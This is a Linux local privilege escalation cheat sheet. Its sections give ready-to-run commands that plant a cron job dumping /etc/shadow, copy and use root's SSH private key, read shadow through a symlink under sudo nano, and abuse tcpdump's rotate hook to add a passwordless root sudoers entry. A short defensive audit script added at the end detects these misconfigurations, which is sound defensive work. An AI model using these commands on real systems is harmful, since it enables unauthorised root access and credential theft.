Local Privilege Escalation

SUID

find / -perm -4000 2>/dev/null

Exploitation depends on what the SUID binary does: one that reads or writes files as its owner can be used to grab SSH keys or the shadow file.

Cron

# Find bad privs (cron files writable by other users)
find /etc/cron* -type f -perm -o+w -exec ls -l {} \;

# Look at when it will run and as whom
cat /etc/crontab

# Get it to write the shadow file somewhere readable
echo -e '#!/bin/bash\n/bin/cat /etc/shadow > /tmp/shadow' > /etc/cron.hourly/oddjob

Readable SSH

# Check listing root
ls -la /root

# Check listing ssh
ls -la /root/.ssh

# Read file (worth trying even if you can't list the contents of .ssh)
cat /root/.ssh/id_rsa

# Make SSH dir
mkdir /home/<user>/.ssh

# Copy SSH key into it
cp /root/.ssh/id_rsa /home/<user>/.ssh

# Change perms (ssh rejects a private key that is group- or world-readable)
chmod 600 /home/<user>/.ssh/id_rsa

# SSH
ssh -i /home/<user>/.ssh/id_rsa root@localhost

Symlink

# Check sudo rights
sudo -l

# If you have sudo rights for something like nano on a specific file,
# create a symlink from that file to shadow and then read it.
# File in example is readme.txt

ln -s /etc/shadow readme.txt

# Set a terminal type nano can draw on
export TERM=xterm

# Read file
sudo nano readme.txt

TCPDump

# If tcpdump is in the sudo list then we can abuse it

# Create a file /tmp/elevate with these contents:

#!/bin/bash
echo "james ALL=(root) NOPASSWD: ALL" >> /etc/sudoers

# Make it executable and have tcpdump run it as root via the post-rotate hook (-z)
chmod +x /tmp/elevate
sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/elevate -Z root

sudo bash
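An audit script added here as the defensive counterpart to the sections above; it is not part of the original cheat sheet. Each function checks one of the misconfigurations the page relies on (SUID binaries, world-writable cron files, readable private keys, sudo rules granting nano, tcpdump or NOPASSWD: ALL) and prints the offending paths or sudoers lines; function names and the --live flag are this example's own.

```shell
#!/bin/sh
# Added audit helper, not part of the original cheat sheet. Every function
# takes paths as arguments so it can be pointed at a test tree as well as the
# live system; run with --live to scan the real paths used on this page.

# SUID binaries, same test as the page's find, restricted to one filesystem.
audit_suid() {
    find "$@" -xdev -type f -perm -4000 2>/dev/null | sort
}

# Cron files writable by "other": anything placed here runs as root on schedule.
audit_cron() {
    find "$@" -type f -perm -o+w 2>/dev/null | sort
}

# Private keys (id_* without .pub) that other users can read.
audit_ssh_keys() {
    find "$@" -type f -name 'id_*' ! -name '*.pub' -perm -o+r 2>/dev/null | sort
}

# sudoers lines handing out NOPASSWD: ALL, nano or tcpdump (the two binaries
# the Symlink and TCPDump sections abuse). Prints matching lines with numbers.
audit_sudoers() {
    grep -nE 'NOPASSWD:[[:space:]]*ALL|/(nano|tcpdump)([[:space:]]|$)' "$@" 2>/dev/null
}

if [ "${1:-}" = "--live" ]; then
    echo "== SUID binaries";             audit_suid /
    echo "== world-writable cron files"; audit_cron /etc/crontab /etc/cron*
    echo "== readable private keys";     audit_ssh_keys /root/.ssh /home/*/.ssh
    echo "== risky sudoers rules";       audit_sudoers /etc/sudoers /etc/sudoers.d/*
fi
```

Each finding maps directly to a fix: remove the SUID bit or the o+w bit, chmod 600 the key, and replace the sudo rule with one that cannot edit or execute arbitrary files.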